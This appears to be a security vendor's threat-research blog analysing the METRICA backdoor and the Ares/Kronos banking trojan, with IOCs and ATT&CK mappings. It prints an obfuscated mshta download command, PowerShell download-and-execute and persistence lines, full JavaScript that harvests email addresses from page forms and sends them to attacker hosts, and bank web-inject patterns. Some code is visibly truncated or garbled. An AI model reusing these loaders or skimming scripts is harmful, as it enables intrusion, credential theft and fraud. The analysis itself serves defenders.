%WINDIR%\System32\cmd.exe /c "set a=start ms&&set b=hta ht&&set c=tps://&&set d=web-google.azur&&set set f=%a%%b%%c%%d%%v%&&call %f%"&&exit

The above command line leverages MSHTA to download the malicious VBScript from the URL: web-google.azureedge[.]net/doc-YUSKQOPZUFD

The downloaded VBScript in turn connects to the URL string.azureedge[.]net/doc49672.jpeg/ps1/9876/ to download the next-stage PowerShell code. The downloaded PowerShell code has C# code embedded inside it, which is executed inline by the PowerShell code.
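The obfuscation in the LNK command line above is simple string splitting: each `set` assignment holds a fragment of the real command, and `call %f%` runs the concatenated result. A short Python sketch that emulates this cmd.exe-style expansion for the fragments visible in the capture (the `%v%` assignment is truncated in the sample command line, so a placeholder is used for it):

```python
# Emulate the cmd.exe "set"-fragment concatenation used by the LNK file.
# Fragments a-d are taken from the captured command line; "v" was not
# recovered from the capture, so a placeholder value stands in for it.
fragments = {
    "a": "start ms",
    "b": "hta ht",
    "c": "tps://",
    "d": "web-google.azur",
    "v": "<truncated>",  # placeholder: not present in the captured sample
}

def expand(template: str, env: dict) -> str:
    """Expand %name% references the way cmd.exe would at 'call' time."""
    out = template
    for name, value in env.items():
        out = out.replace(f"%{name}%", value)
    return out

f = expand("%a%%b%%c%%d%%v%", fragments)
print(f)  # -> start mshta https://web-google.azur<truncated>
```

Even with the final fragment missing, the reconstruction makes clear that the payload is a `start mshta https://web-google.azur...` invocation, matching the download URL identified above.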
This C# code is a backdoor which we have named “METRICA.”

METRICA backdoor analysis

The METRICA backdoor is executed inline by wrapper PowerShell code to make the backdoor execution fileless.

Note: PowerShell natively supports inline C# execution. Using the following snippet of code, it is possible to perform inline execution of C# code:

Add-Type -ReferencedAssemblies {Add any assembly references here} -TypeDefinition {Add C# code here} -Language CSharp;

Figure 6 below shows the PowerShell code calling the C# code.

Figure 6: PowerShell code calling C# code

In order to avoid static detection and hinder analysis, the METRICA backdoor is generated on the fly by a server-side generator (in the case of one of the hosting services). Because of this, each request to download the backdoor results in a backdoor with a different size and different static string obfuscation. When the backdoor is hosted on the other service, it is not generated on the fly but seems to be regularly updated by the attacker.

NOTE: This is likely because the hostings are directly owned by the attacker.

Code analysis

The METRICA backdoor execution starts by calling its main function from the wrapper PowerShell code. The main function takes the following three input parameters:

● A domain name
● A key, which is used for encryption/decryption of data
● A default value to use for the delay between network requests

In the analysed sample, the following values were passed, which can also be seen in Figure 6 above:

● Domain Name: "https://global.asazure[.]"
● Key: "ENoztOORXAkUuWOkSdzLaRRL"
● Default Delay Value: "9567"

Note: Based on further analysis, we found that the ‘Key’ is configured per C2 server and is never sent as part of network communication.

Execution of the main function performs the following operations:

1. Registers the infected machine to the C2 server. This is the bot registration stage.
2. Creates a thread to perform keylogging and capture foreground/active window text.
3.
Starts the C2 communication and executes the commands received by calling the required function.

Figure 7 highlights the different operations performed by the main function.

Figure 7: Different operations performed by the main function

BOT registration

The BOT registration request is sent to the C2 server with the following information from the infected system:

● Generated BOT ID
● Computer Name
● User Domain
● UserName

The collected information is formatted as shown below:

register {BOT ID} {ComputerName}{DomainName}\\{UserName}

For more details about the network traffic, please refer to the Network Communication section of the analysis.

Information collection and exfiltration

The METRICA backdoor collects the following information from the infected system:

● Keystrokes
● Foreground/active window text

To exfiltrate the logged information, a Timer object is created which calls the log exfiltration function every 5 seconds. This is done to maintain fileless execution, since the keystrokes and window text are stored in memory and cleared as the information is exfiltrated. The logged information is formatted as shown below:

userinput {Base64_encoded_logged_information}

Figure 8 highlights the information logging and exfiltration operations.

Figure 8: Information logging and exfiltration operations

More details about the network traffic are provided in the Network Communication section of the analysis.

Network communication

Initialization

The METRICA backdoor performs all network communication over HTTPS. All web requests are created using the domain name, which is passed as the first parameter to the main function described earlier, and a network path, which is generated as a random string for every request.
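For anyone writing network detections, the two message layouts quoted above can be sketched in a few lines of Python (the helper names are ours, not from the malware; only the field layouts come from the observed traffic):

```python
import base64

def registration_message(bot_id: str, computer: str, domain: str, user: str) -> str:
    """Mirror of the observed registration format:
    register {BOT ID} {ComputerName}{DomainName}\\{UserName}"""
    return f"register {bot_id} {computer}{domain}\\{user}"

def userinput_message(logged: str) -> str:
    """Mirror of the observed keylog-exfiltration format:
    userinput {Base64_encoded_logged_information}"""
    encoded = base64.b64encode(logged.encode("utf-8")).decode("ascii")
    return f"userinput {encoded}"

print(registration_message("BOT01", "DESKTOP-X", "WORKGROUP", "alice"))
print(userinput_message("typed text"))
```

The fixed `register ` and `userinput ` prefixes, followed in the latter case by a Base64 run, are simple anchors for content-inspection rules on decrypted traffic.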
Afterwards, the following header fields are initialized:

● Method: “POST”
● UserAgent: Initialized with the OS version string
● Timeout: 10000
● Host: Attacker-controlled endpoint on the CDN
● ProxyCredentials: Default credentials

Request/Response Format

All network requests/responses use the following format:

{
UUID: “Unique identifier for every exfiltration request/response pair”,
ID: “BOT ID of the infected machine”,
DATA: “Encrypted and Base64 encoded data”
}

BOT registration request

Like every other backdoor, the first network request is the BOT registration. The data sent as part of the request is described in the BOT registration section above. No UUID is used in the registration request.

C2 Commands

The network request to fetch the C2 command is sent at regular intervals. The UUID and DATA fields are empty for all such requests. Based on the C2 response from the server, different operations are performed. The METRICA backdoor checks whether the UUID field in the response is set. If the UUID field is set, it decrypts the response data specified in the DATA field. The decrypted data then specifies the command to be executed. The table below describes the commands supported by the backdoor and the corresponding action performed:

Command | Action performed
delay | Updates the time delay between the network requests
screenshot | Captures a screenshot of all the connected screens and sends them to the C2 server
exit | Stops fetching new commands from the C2 server
Raw PowerShell command | Executes the raw PowerShell command and sends the output to the C2 server

1. delay

Updates the time delay between the network requests with the value specified by the C2 server. No network response is sent back.

2. screenshot

Captures a screenshot of each available screen and sends them to the C2 server one at a time. To maintain fileless execution, the screenshot is kept in memory while it is sent to the C2 server.

3. exit

Sets a boolean variable which breaks the C2 communication loop. No network response is sent back.

4. Raw PowerShell command

Executes the raw PowerShell command and sends the result back to the C2 server. To execute a PowerShell command from C# code, a Runspace is created and a Pipeline is opened to it. The Pipeline is then used to specify the PowerShell command to be executed and to configure the Runspace to send the output back to the C# code. The output is then sent to the C2 server.

Note: To read more about Runspaces, check this article.

Persistence

METRICA achieves persistence by leveraging PowerShell code to download a new LNK file from Dropbox and drop it in the Startup directory. The PowerShell code is broken into two stages:

● The first-stage PowerShell code is sent as a C2 command, which downloads and executes the second-stage PowerShell code from the specified remote location.
● The second-stage PowerShell code downloads the new LNK and drops it in the Startup directory.

First-stage PowerShell code sent as a C2 command:

IEX (New-Object Net.Webclient).downloadstring('')

Second-stage PowerShell code for downloading the new LNK and dropping it in the Startup directory:

$client = new-object System.Net.WebClient;$client.DownloadFile("","$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Startup.lnk");

Note: The reason for achieving persistence only via an explicit C2 command could be to avoid persistent infection in cases where the victim profile is not of interest to the attacker. Further, the entire attack chain is fileless except for the initial ZIP download, so this also helps minimize the footprint on the infected system.

Zscaler Sandbox report

Figure 9 shows the Zscaler Cloud Sandbox successfully detonating and detecting this threat.

Figure 9: Zscaler Sandbox report

In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators at various levels.
PS.Backdoor.Metrica
Win32.Downloader.Metrica
LNK.Downloader.Metrica

MITRE ATT&CK TTP Mapping

ID | Technique | Description
T1189 | Drive-by Compromise | Compromised plugin JavaScript file
T1204.002 | User Execution: Malicious File | User opens the downloaded ZIP file and executes the contained LNK
T1059 | Command and Scripting Interpreter | Executes malicious JavaScript and PowerShell code
T1547.001 | Registry Run Keys / Startup Folder | Creates an LNK file in the Startup folder for persistence
T1140 | Deobfuscate/Decode Files or Information | Strings and other data are obfuscated in the payloads
T1218 | Signed Binary Proxy Execution | Uses mshta to execute the VBScript code
T1027.002 | Obfuscated Files or Information: Software Packing | Payloads are packed in layers
T1082 | System Information Discovery | Gathers system OS version info
T1033 | System Owner/User Discovery | Gathers the currently logged-in username
T1113 | Screen Capture | Captures a screenshot of all the connected screens
T1056 | Input Capture | Captures keystrokes and foreground window text
T1132.001 | Data Encoding: Standard Encoding | Uses Base64 encoding for data exfiltration
T1071.001 | Application Layer Protocol: Web Protocols | Uses HTTPS for C2 communication
T1041 | Exfiltration Over C2 Channel | Data is exfiltrated using the existing C2 channel

Indicators of compromise

Hashes

// ZIP
53558b99cbfe6f99dd1597e21b49b07e
d6fb36a86aec32f17220050da903a0ce

// LNK
2d0f946bac9b565b15cb739473bd4b20
272edc017f01eef748429358b229519b

ZIP file download links
www.dropbox[.]com/s/3mrfasci8ibhms9/
www.dropbox[.]com/s/g2hw0s5qec1kvzs/

Intermediate stage payload hosting

// MD5: 2d0f946bac9b565b15cb739473bd4b20
hxxps://web-google.azureedge[.]net/doc-YUSKQOPZUFD
hxxps://
hxxps://string.azureedge[.]net/doc49672.jpeg/ps1/9876/

// MD5: 272edc017f01eef748429358b229519b
hxxps://
hxxps://
hxxps://

// Persistence LNK
hxxps://
hxxps://theme.azureedge[.]net/microsoft.jpeg/ps1/9567/

C2 domains (POST method used for communication)

JavaScript files
metrica2[.]azureedge[.]net/tracking
metrica2[.]azureedge[.]net/PatternSite
metrica2[.]azureedge[.]net/PatternSiteLock
metrica2[.]azureedge[.]net/lockpage
metrica2[.]azureedge[.]net/slashpage

Banner hosting
metrica2[.]azureedge[.]net/templates/template_2/modal_test2_animate_responsive_json.html

Dropped filenames and full paths
Terms And Terms And Conditions.lnk
{APPDATA}\Microsoft\Windows\Start Menu\Programs\Startup\Startup.lnk

OSINT submissions

Hashes

// ZIP
b0cf113c0eddd55aa536c75e6ac4d670
8593e4d458ef4fc6ca35b1138c9e37a4

// LNK
2e68d6a2b29a12de919bfd936ee62d7b
422a4fc87fece907f93daa4d3e23f907

Intermediate stage payload hosting
hxxps://doc-web1.azureedge[.]net/doc-YUSKQOPZUFD
hxxps://compos20.azureedge[.]net/doc-YUSKQOPZUFD

Appendix

//Stage-1 JavaScript
startDate = sessionStorage.getItem('startDate');
startMail = sessionStorage.getItem('startMail');
var metrica_path = '';
var metrica_path_lock = '';
var metrica_lock = '';
var metrica_slashpage = '';
function load_path(metrica, email){
  var metricasrc = document.createElement('script');
  metricasrc.src = ('https:' == document.location.protocol ?
  'https://' : 'http://') + metrica + '?q=' + encodeURIComponent(email);
  document.getElementsByTagName("html")[0].appendChild(metricasrc);
}

function getEmails(search_in) {
  array_mails = search_in.toString().match(/([a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9._-]+)/gi);
  if(array_mails !== null){
    return array_mails[0];
  } else{
    return '';
  }
}

if (startDate) {
  startDate = new Date(startDate);
}

if (startDate != null && Math.trunc((new Date() - startDate)/1000) < 100) {
  email = startMail;
  load_path(metrica_lock, email);
}

if (startDate == null){
  var is_email = 0;
  var forminput = document.querySelectorAll('input');
  function valid(){
    for(var i = 0; i < forminput.length; i++) {
      if (forminput[i].type=='email' || forminput[i].type=='text'){
        if (forminput[i] != document.activeElement) {
          var email = getEmails(forminput[i].value);
          if(email != ''){
            startMail = sessionStorage.getItem('startMail');
            if (startMail) {
              startMail = email;
            } else {
              startMail = email;
              sessionStorage.setItem('startMail', startMail);
            }
            load_path(metrica_slashpage, email);
            clearInterval(myVar);
            return;
          }
        }
      }
    }
  }
  var myVar = setInterval(valid, 500);
}

//Stage-2 JavaScript
startDate = sessionStorage.getItem('startDate');
if (startDate) {
  startDate = new Date(startDate);
} else {
  startDate = new Date();
  sessionStorage.setItem('startDate', startDate);
}
var formdiv = document.querySelector('body');
var pagediv = document.createElement('div'); = 'slashpage'; = 'position:absolute;z-index:100000;';
pagediv.innerHTML = '<iframe name="splashpage-iframe" src="about:blank" style="margin:0;border:0;padding:0;width:100%;height:100%" ></iframe><br /> '
formdiv.insertBefore(pagediv, formdiv.firstChild);
var metricasslash = document.createElement('script');
metricasslash.src = ('https:' == document.location.protocol ?
  'https://' : 'http://') + metrica_path + '?q=' + encodeURIComponent(startMail);
document.getElementsByTagName("html")[0].appendChild(metricasslash);

//Stage-3 JavaScript
var splashpage = {
  splashenabled: 1,
  splashpageurl: "//",
  enablefrequency: 0,
  displayfrequency: "2 days",
  cookiename: ["splashpagecookie", "path=/"],
  autohidetimer: 0,
  launch: false,
  browserdetectstr: (window.opera && window.getSelection) || (!window.opera && window.XMLHttpRequest),
  output: function(){
    this.splashpageref = document.getElementById("slashpage");
    this.splashiframeref = window.frames["splashpage-iframe"];
    this.splashiframeref.location.replace(this.splashpageurl);
    this.standardbody = (document.compatMode == "CSS1Compat") ? document.documentElement : document.body;
    if(!/safari/i.test(navigator.userAgent)) this.standardbody.style.overflow = "hidden"; = 0; = 0; = "100%"; = "100%";
    this.moveuptimer = setInterval("window.scrollTo(0,0)", 50);
  },
  closeit: function(){
    clearInterval(this.moveuptimer); = "none";
    this.splashiframeref.location.replace("about:blank");
    this.standardbody.style.overflow = "auto";
  },
  init: function(){
    if(this.enablefrequency == 1){
      if(/sessiononly/i.test(this.displayfrequency)){
        if(this.getCookie(this.cookiename[0] + "_s") == null){
          this.setCookie(this.cookiename[0] + "_s", "loaded");
          this.launch = true;
        }
      } else if(/day/i.test(this.displayfrequency)){
        if(this.getCookie(this.cookiename[0]) == null || parseInt(this.getCookie(this.cookiename[0])) != parseInt(this.displayfrequency)){
          this.setCookie(this.cookiename[0], parseInt(this.displayfrequency), parseInt(this.displayfrequency));
          this.launch = true;
        }
      }
    } else this.launch = true;
    if(this.launch){
      this.output();
      if(parseInt(this.autohidetimer) > 0) setTimeout("splashpage.closeit()", parseInt(this.autohidetimer) * 1000);
    }
  },
  getCookie: function(Name){
    var re = new RegExp(Name + "=[^;]+", "i");
    if(document.cookie.match(re)) return document.cookie.match(re)[0].split("=")[1];
    return null;
  },
  setCookie: function(name, value, days){
    var expireDate = new Date();
    if(typeof days !=
"undefined"){
      var expstring = expireDate.setDate(expireDate.getDate() + parseInt(days));
      document.cookie = name + "=" + value + "; expires=" + expireDate.toGMTString() + "; " + splashpage.cookiename[1];
    }
    else document.cookie = name + "=" + value + "; " + splashpage.cookiename[1];
  }
};
if(splashpage.browserdetectstr && splashpage.splashenabled == 1) splashpage.init();

Tue, 23 Mar 2021 09:00:12 -0700 Sudeep Singh

Ares Malware: The Grandson of the Kronos Banking Trojan

Kronos is a banking trojan that first emerged in 2014 and was marketed in underground forums as a crimeware kit for conducting credit card fraud, identity theft, and wire fraud. In September 2018, a new Kronos variant named Osiris introduced several new features, including TOR for command and control (C2) communications. The last update to Osiris appears to have been around mid-2019. In February 2021, Zscaler ThreatLabz identified a new Kronos variant, which surfaced via spam campaigns targeting German speakers and calls itself Ares. In Greek mythology, Ares is the son of Zeus and grandson of Kronos, so the naming convention appears to mark this new malware variant as the third generation of Kronos. Ares still appears to be under development, alongside an information stealer that harvests credentials from various applications including VPN clients and web browsers; the malware can also exfiltrate arbitrary files and cryptocurrency wallets. The threat actor behind this new variant continues to use both Osiris and Ares in parallel. In this blog post, we will examine these new malware developments and campaigns.

DarkCrypter

Recent samples of Osiris and Ares have been protected by a malware packer written in C++ that calls itself DarkCrypter. The packer contains the PDB path d:\scm\Italy\dopplegang\DarkCrypter\Bin\Clean.pdb. The code is not related to the commercial packer of the same name, DarkCrypter, that has been cracked and leaked online.
Interestingly, the packer shares code with Kronos and Osiris, including the string encryption algorithm. When the string table is decrypted, the first 41 entries are identical to older Kronos variants, with eight new string additions (shown below) used to detect sandbox environments:

atcuf32.dll
umengx86.dll
sandboxie.dll
libctc_sandbox.dll
atcuf64.dll
antimalware_provider32.dll
antimalware_provider64.dll
libctc_onexecute.dll

If the anti-analysis checks pass, the packer proceeds to the next step. There are at least two variants of the packer. The first variant decrypts the next-stage payload using Blowfish, but with a non-standard key size: Blowfish keys are typically between 4 bytes and 56 bytes, whereas the Blowfish decryption implementation in DarkCrypter supports a hardcoded key size of 288 bytes (although only the first 72 bytes are effectively used). This may be designed to break cryptographic libraries that implement Blowfish according to the standard, where the maximum key size is limited to 56 bytes. The Blowfish key is located by computing a djb2 hash of each section name in the PE header. The code compares the resulting hash value against two hardcoded values that map to the section names .text (0xb80c0d8) and .sjdata (0xecae6faa). The second variant of the DarkCrypter packer embeds the second-stage payload in a compressed format rather than a Blowfish-encrypted format. The compression algorithm is identical to the one found in Ares and in Ares-related components, including a packer that impersonates a bitmap image header.

Modified UPX Packer

The threat actor has also experimented with modifying UPX headers, which have well-known section names. The threat actor's modifications replace the UPX section names (UPX0, UPX1, ...) with standard section names like .text, .data, and .rdata.
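The djb2 section-name lookup used to locate the Blowfish key is easy to reproduce. The sketch below uses the classic djb2 variant (h = h*33 + c, truncated to 32 bits), which matches both constants hardcoded in the packer:

```python
def djb2(name: bytes) -> int:
    """Classic djb2 hash (h = h*33 + c), truncated to 32 bits."""
    h = 5381
    for b in name:
        h = (h * 33 + b) & 0xFFFFFFFF
    return h

# DarkCrypter compares each PE section name's hash against these two
# hardcoded constants to find the section holding the Blowfish key material.
assert djb2(b".text") == 0x0B80C0D8
assert djb2(b".sjdata") == 0xECAE6FAA
```

Both assertions hold, confirming that the hardcoded values correspond to the additive djb2 variant rather than the XOR variant.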
These section-name changes break compatibility with the command-line UPX decompression tool, although the file can still be decompressed and executed. An example of the file header modifications is shown below in Figure 1 on the left, with the alterations highlighted in red. Figure 1. Modified and Restored UPX Headers These changes can easily be reverted to the original UPX section names, as shown on the right in Figure 1. The UPX command-line utility can then be used to statically unpack the binary, producing the final executable payload.

BMPack

The threat actor has also been using another packer that Zscaler ThreatLabZ has dubbed BMPack. This packer has been used to pack both Osiris and Ares payloads. BMPack first decrypts embedded data using an XOR-based algorithm, followed by RC4. After the decryption stage, the file appears to be a bitmap image, as shown in Figure 2. Figure 2. Fake Bitmap Image Used to Unpack Osiris and Ares Malware Payloads However, closer inspection reveals that the data is not actually a bitmap image, but a specific sequence of data structures. By reverse engineering the packer, the format of these data structures can be determined: each consists of three DWORD values representing the compressed size (red), the uncompressed size (green), and the next offset (blue), followed by the compressed data (orange). An example of the first data structure is shown below in Figure 3. Figure 3. Format of BMPack Data Structures Each decompressed structure holds a different section of a PE file, which is reconstructed and stitched together by a custom loader and then executed.

Ares Malware

Ares is being actively developed, and the malware author continues to create and test new plugins and web injects. In the most recent Ares samples, there is an embedded DLL module that is compressed within the binary. The module contains an export that is designed to establish persistence. This persistence code first copies the malware to the location %APPDATA%\Adobe\AdobeNotificationUpdates.exe.
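Based on the record layout just described, a minimal walker over BMPack's chain of structures might look like the sketch below. The field names are mine, "next offset" is treated as an absolute offset with 0 as a terminator (an assumption for illustration), and the custom compression itself is not reimplemented:

```python
import struct

def parse_bmpack_chunks(blob: bytes, start: int = 0):
    """Walk BMPack's chained records: three little-endian DWORDs
    (compressed size, uncompressed size, next offset) followed by
    the compressed bytes themselves."""
    chunks = []
    offset = start
    while True:
        comp_size, uncomp_size, next_off = struct.unpack_from("<III", blob, offset)
        chunks.append({
            "compressed_size": comp_size,
            "uncompressed_size": uncomp_size,
            "data": blob[offset + 12:offset + 12 + comp_size],
        })
        if next_off == 0:  # assumed terminator for this sketch
            break
        offset = next_off
    return chunks

# Synthetic two-record container: record 1 points at record 2 (offset 16)
rec1 = struct.pack("<III", 4, 8, 16) + b"abcd"
rec2 = struct.pack("<III", 3, 6, 0) + b"xyz"
blob = rec1 + rec2
chunks = parse_bmpack_chunks(blob)
assert [c["data"] for c in chunks] == [b"abcd", b"xyz"]
```

In the real packer, each recovered chunk would then be decompressed to its stated uncompressed size and mapped as a PE section by the custom loader.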
The module then creates a scheduled task named AdobeNotificationUpdates that is designed to execute Ares every two hours (with an expiration date of 2050-05-02 12:05:00). Similar persistence code is also found in many DarkCrypter samples. The Ares persistence module has the same compilation prefix as other modules in its PDB path D:\scm\Italy\ares\source_ob\Release\startup.pdb. Ares attempts to locate an export name with the hash value F4S4G3S4U7C6P2P7, which maps to the string ?Startup@@YAHPA_W@Z. Once the address of this function is located, Ares executes the module. Ares uses the same function hashing algorithm as Kronos, which consists of calculating a CRC64 hash and converting the digest to uppercase hexadecimal characters. The result is then mapped to an alphanumeric value, as shown in the Python code below:

digest = hexdigest(crc64(function_name)).upper()
out = ""
for i in range(len(digest)):
    if i & 1 != 0:
        val = ord(digest[i]) % 9 + ord('0')
    else:
        val = ord(digest[i]) % 25 + ord('A')
    out += chr(val)
return out

Ares contains most of the same code as its predecessors, Kronos and Osiris. However, there are several notable differences between Osiris and Ares, especially with respect to the C2 communications. Most Ares samples currently do not communicate with C2 servers over TOR. It is not entirely clear why most Ares samples have the TOR component removed, but it may be to reduce the malware's file size and to evade corporate firewalls that block TOR network traffic. However, without TOR, the C2 servers are more vulnerable to takedown attempts. Some Ares samples attempt to address this limitation by hardcoding a large number of C2 URLs in the binary; Zscaler ThreatLabz has observed one Ares sample with 101 hardcoded C2 URLs. Ares has also slightly modified the bot ID generation code, replacing the string Kronos with the string Ares, as shown in Figure 4. Figure 4. Comparison Between Kronos and Ares Bot ID Generation Ares uses the HTTP query string parameters shown in Table 1.
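Returning briefly to the export-hashing routine above: a self-contained version is sketched below. The exact CRC64 polynomial Kronos uses is not stated in this analysis, so the ECMA-182 polynomial stands in purely for illustration; the post-processing step, however, follows the decompiled logic as given.

```python
def crc64_ecma(data: bytes) -> int:
    """Bitwise CRC64 using the ECMA-182 polynomial -- a stand-in here, since
    the exact CRC64 variant used by Kronos/Ares is not specified above."""
    poly = 0x42F0E1EBA9EA3693
    crc = 0
    for b in data:
        crc ^= b << 56
        for _ in range(8):
            crc = ((crc << 1) ^ poly if crc & (1 << 63) else crc << 1) & 0xFFFFFFFFFFFFFFFF
    return crc

def ares_hash(function_name: str) -> str:
    """Post-process the digest exactly as in the decompiled routine above."""
    digest = format(crc64_ecma(function_name.encode()), "016X")
    out = ""
    for i, c in enumerate(digest):
        if i & 1:                       # odd positions map to digits '0'-'8'
            out += chr(ord(c) % 9 + ord("0"))
        else:                           # even positions map to letters 'A'-'Y'
            out += chr(ord(c) % 25 + ord("A"))
    return out

h = ares_hash("?Startup@@YAHPA_W@Z")
assert len(h) == 16
assert all("0" <= c <= "8" for c in h[1::2]) and all("A" <= c <= "Y" for c in h[0::2])
```

Note how the mapping explains the shape of hashes like F4S4G3S4U7C6P2P7: letters at even positions, digits at odd positions. Because the polynomial here is an assumption, this sketch will not reproduce the malware's exact hash values.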
The HTTP request that sends the file is unique to Ares and is discussed in more detail below.

Query String - Description
a=0 - Send log data
a=1 - Download web injects
a=2 - Send keylogger data
a=3 - Send file created by Ares Stealer
a=4 - Request new commands
Table 1. Ares Query String Parameters

Ares Commands

Ares supports many of the same commands as Kronos and Osiris. However, some of the commands have been modified, and the malware uninstall command (0x1) was removed. There are four modified commands supported by Ares, shown below in Table 2:

Command Number - Description
0x3 - Set registry value name MSE to 0
0x4 - Set registry value name MSE to 1
0x6 - Download, decompress, and map Ares Stealer into memory, and execute
0xC - Download, decompress, and map module into memory, and execute
Table 2. New Commands Introduced by Ares

The commands 0x3 and 0x4 attempt to set a registry value named MSE to zero and one, respectively, under the registry key HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion. However, this registry key does not exist, and both functions will fail. This is likely an oversight by the malware author, who accidentally left out Windows in this registry path between Microsoft and CurrentVersion. The registry value is not referenced elsewhere in Ares, so it may hint at a future use. One of the most significant modifications is the command 0x6, which downloads, decompresses, and maps a PE file into memory, and executes it. Command 0x6 specifically searches for an export name with the hash value C3E0Q6R7F1H2G5A4, which maps to the string CollectInfo. The code passes two string parameters to the CollectInfo export: the first string is a pattern provided by the C2 server, and the second is hardcoded to the string %APPDATA%\Google\ (with a trailing backslash). Zscaler ThreatLabZ has observed this Ares command being used to download a file from the URL http://mydynamite.dynv6[.]net/panel/upload/stealer.dll. The first four bytes of the response are the uncompressed file size.
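That size-prefixed framing can be illustrated with a small round-trip sketch. Here zlib stands in for Ares's custom compression algorithm (which is not public), and the function name is mine:

```python
import struct
import zlib

def unwrap_stealer_response(payload: bytes) -> bytes:
    """The first four bytes give the uncompressed size; the rest is the
    compressed module (zlib here as a stand-in for the custom algorithm)."""
    (uncompressed_size,) = struct.unpack_from("<I", payload, 0)
    data = zlib.decompress(payload[4:])
    assert len(data) == uncompressed_size  # sanity check against the prefix
    return data

# Round trip with a dummy "module" in place of stealer.dll
module = b"MZ" + b"\x00" * 62
wire = struct.pack("<I", len(module)) + zlib.compress(module)
assert unwrap_stealer_response(wire) == module
```

In the malware, the recovered module is mapped directly into memory rather than written to disk.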
The downloaded file is decompressed using the same compression algorithm as BMPack. Ares contains code artifacts from the development of command 0x6: samples contain an unreferenced function that attempts to open a file located at d:\scm\Italy\ares\source_ob\Binaries\Release\KittyDll.dll.cmp. The file is decompressed and mapped into memory using the same process as command 0x6. After the file is mapped, the export CollectInfo is called with the parameters %userprofile%Documents|*.txt|5 and NULL. The purpose of these fields is described in the next section. Note that there is a missing backslash character between %userprofile% and Documents; this string serves as a directory path, and without the backslash the path is invalid. Zscaler ThreatLabZ has also identified Ares samples that contain another unreferenced function that loads a VNC plugin by attempting to open a file located at d:\scm\Italy\ares\source_ob\Binaries\Release\vnc.dll.cmp. Similar to the stealer plugin, the file is decompressed and mapped into memory, and the export MakeItStart is called. The MakeItStart export name is resolved like the other Ares functions, using the same CRC64-based hash algorithm and comparing the result with F0U5R4R6Q8H1P3E5. Ares will then terminate the VNC plugin by resolving the export name MakeItStop via the same process and comparing the result with the hash value C6P3T6Q8H1P3E5A8. The command 0xC is the most recent modification to Ares and is only found in newer samples.

Ares Stealer

Ares Stealer is downloaded by Ares and invoked via the export name CollectInfo. The malware is written in C++ and uses the Boost and Curl libraries. Ares Stealer has compilation artifacts showing that the Boost library was compiled in the directory d:\scm\Italy\tools\boost_1_74_0\boost. This directory prefix is identical to DarkCrypter's PDB path and to the location from which the unreferenced Ares test functions attempt to load plugins.
This artifact, along with the shared compression code, suggests that the same malware author likely developed DarkCrypter, BMPack, Ares, and Ares Stealer. The Ares Stealer export CollectInfo takes two parameters: a pipe-delimited string and a filename string. The pipe-delimited string carries three arguments, which are used by the stealer's file grabber feature: the first is the directory in which to start the file enumeration process, the second is a search pattern, and the last is the directory search depth. The filename string is used to store the results of the extraction, which are added to a zip file. An example command string observed from an Ares C2 server is %userprofile%|pass*.txt|5. This command will search a victim's user profile directory up to five levels deep for text files that have the prefix pass. Ares Stealer collects detailed system information and harvests credentials for numerous applications including FTP clients, VPN clients, web browsers, instant messengers, and email clients. It can also steal files, cryptocurrency wallets, cookies, and credit cards.
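The grabber command format is simple enough to illustrate with a short sketch that parses the pipe-delimited string and performs the equivalent depth-bounded search (all helper names here are mine, not the malware's):

```python
import fnmatch
import os

def parse_grab_command(cmd: str):
    """Split an Ares Stealer file-grabber command of the form 'dir|pattern|depth'."""
    start_dir, pattern, depth = cmd.split("|")
    return start_dir, pattern, int(depth)

def find_matches(start_dir: str, pattern: str, max_depth: int):
    """Enumerate files under start_dir, at most max_depth directory levels deep."""
    matches = []
    start_dir = os.path.abspath(start_dir)
    base_depth = start_dir.count(os.sep)
    for dirpath, dirnames, filenames in os.walk(start_dir):
        if dirpath.count(os.sep) - base_depth >= max_depth:
            dirnames[:] = []  # prune: stop descending past the depth limit
        for name in filenames:
            if fnmatch.fnmatch(name, pattern):
                matches.append(os.path.join(dirpath, name))
    return sorted(matches)

start_dir, pattern, depth = parse_grab_command(r"%userprofile%|pass*.txt|5")
assert (pattern, depth) == ("pass*.txt", 5)
```

A command like the observed %userprofile%|pass*.txt|5 would thus sweep a profile directory for likely password files before zipping the results.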
The stealer will attempt to extract information from the following applications:

FTP clients: Filezilla
VPN clients: NordVPN, OpenVPN, ProtonVPN
Web browsers: Mozilla Firefox, Google Chrome, Microsoft Edge, Microsoft Internet Explorer, Chromium, Cyberfox, BlackHawk, Comodo IceDragon, CometBird, SeaMonkey, Pale Moon, Waterfox, Atom, Chromodo, Uran, CocCoc, Nichrome, Sputnik, K-Meleon, Maxthon 3, 360 Browser, Amigo, Comodo Dragon, Orbitum, QIP Surf, Liebao, Coowon, Catalina Group Citrio, Fenrir Sleipnir, Elements, Kometa, Chedot, CentBrowser, 7 Star, Iridium, MapleStudio ChromePlus, Torch, Yandex Browser, Epic Privacy Browser, Opera, Brave Browser, Vivaldi, Blisk
Cryptocurrency wallet applications: Coinomi, Guarda, Atomic Wallet, Electrum, Ethereum, Exodus, Bytecoin, Armory, Zcash, Bitcoin, Litecoin
Instant messenger clients: Pidgin
Email clients: Outlook

Osiris

The Osiris version that has been used by this threat actor contains a number of new features since the original version that appeared in April 2018. These updates were introduced around mid-2019 and include the following changes:

A new beacon request format that includes information about the compromised system
Zlib compression to reduce the size of requests and responses (including web injects)
The ability to deploy TeamViewer on a compromised host
The ability to steal a victim's Outlook contacts via Nirsoft's OutlookAddressBookView utility
The ability to send spam emails to a victim's contact list
New remote access capabilities

The threat actor has an Osiris C2 server located at http://ylnfkeznzg7o4xjf[.]onion/kpanel/connect.php, which has been instructing infected systems to steal and exfiltrate web browser and email credentials. The web browser harvesting command downloads a sqlite3 library from http://qqkzfkax24p4elax[.]onion/kpanel/upload/sqlite3.dll, which is a dependency for extracting Google Chrome passwords. A second module for harvesting Firefox credentials from 64-bit systems is downloaded from http://qqkzfkax24p4elax[.]onion/kpanel/upload/ffc64.exe.
The C2 is also serving a web inject configuration file, which targets clients at German financial institutions with the URL patterns shown below:

set_url https://** GPI
set_url https://*.de/*/entry* GPI
set_url https://*.de/banking-*/portal?* GPI
set_url https://*.de/banking-*/portal;* GPI
set_url https://*.de/portal/portal* GPI
set_url https://*.de/privatkunden/* GPI
set_url https://*.de*abmelden* GPI
set_url https://*.de/de/home* GPI
set_url https://*.de/en/home* GPI
set_url https://*.de/fi/home* GPI
set_url https://** GPI
set_url https://*banking.sparda-* GPI
set_url https://* GPI
